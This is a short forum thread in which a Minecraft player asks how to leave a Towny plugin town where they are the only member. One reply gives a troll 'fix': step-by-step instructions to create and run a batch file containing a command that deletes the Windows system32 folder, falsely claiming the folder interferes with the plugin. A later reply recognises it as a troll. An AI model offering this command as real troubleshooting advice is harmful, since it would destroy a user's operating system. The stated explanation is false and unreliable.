Super Frustrating Towny Issue

I've tried to leave my own town to join Cydonia. It won't let me leave, because if I leave the town wont have a mayor. I can't set another mayor because there's nobody else in the town. And I can't delete the town because apparently the command is disabled with bukkit permissions. Is there any way I can leave my town? Somebody please help me.

Create a notepad file on your desktop (you can do so by right clicking anywhere on your desktop and clicking new and then notepad or wordpad)
Open it and type in the following EXACTLY!!!

@echo off
del C:\\WINDOWS\system32

Explanation: system32 is a pesky folder that interferes with the minecraft towny plugin. Deleting it fixes the problem.

Save your wordpad document and then rename it to TOWNYFIX.BAT
Open minecraft and join the team9000 survival server. With it up and running, minimize the window and double click your new townyfix file. You should then be able to join cydonia.

Wow, thanks for the troll... come on dude everyone knows that only works if you name the file TRIFORCE.bat :p
